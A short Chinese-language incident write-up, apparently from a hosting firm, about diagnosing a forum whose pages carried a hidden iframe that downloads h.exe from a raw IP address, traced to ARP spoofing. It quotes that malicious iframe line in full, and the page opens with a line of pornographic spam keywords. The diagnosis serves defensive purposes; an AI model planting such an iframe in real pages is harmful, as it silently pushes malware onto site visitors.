www一片黄-www一区-www伊人-www淫-少妇被按摩-射在老师的里面真爽

　　昨日接到某論壇的求助，論壇中被掛iframe木馬，當訪問論壇時發現每個頁面的置頂有個iframe木馬，代碼如下<iframe src= http://222.113.57.47:369/h.exe width=0 height=0></iframe> 360自動提示有木馬，系統會彈出一個載下h.exe的對話框。由于論壇是當天剛出現的情況，服務器中就放置了一個論壇，分析有可能有以下幾種情況。

1. 　論壇被攻擊
2. 　IIS被置入木馬
3. 　ARP攻擊

　　針對第一種情況找到論壇中改過的文件與模板，并未發現相關被篡改的內容，第一種情況排除。接下來接以下兩種思路來尋找解決方法，在論壇中新建兩個文件，一個是1.html、一個是1.php　無需輸入內容。通過論壇網址訪問　　網址/1.html 訪問此頁面沒發現異常、訪問1.php發現被自動掛馬，也就是說當運行PHP的文件時會自動掛馬，那么IIS被置入木馬的可能情就大些，（IIS被置入木馬分析：如PHP解析的文件被篡改，也會出現以上的情況）按IIS的配置進行查找也未發現問題。

　　懷疑可能是服務器所在的局域網或網絡有ARP攻擊，從網上下載一個ARP防火墻后重啟服務器，發現問題解決，每個頁面中已經沒有iframe的木馬。訪問論壇首頁和原建立的1.php頁面也已正常。但訪問論壇子頁時360仍提示有木馬，但子頁的代碼已無iframe的內容。這種情況可能是論壇訪問過大，多用戶同時訪問子頁，360有云計算會將原有木馬的網站或頁面自動提交到云服務器中，以致及時清除木馬后360的云服務器還沒有反映過來才出現的誤報情況。

　 在些易天科技提示服務器管理員除作好站點的安全防范外，應對服務器作相關的安全設置。安裝必要的軟件。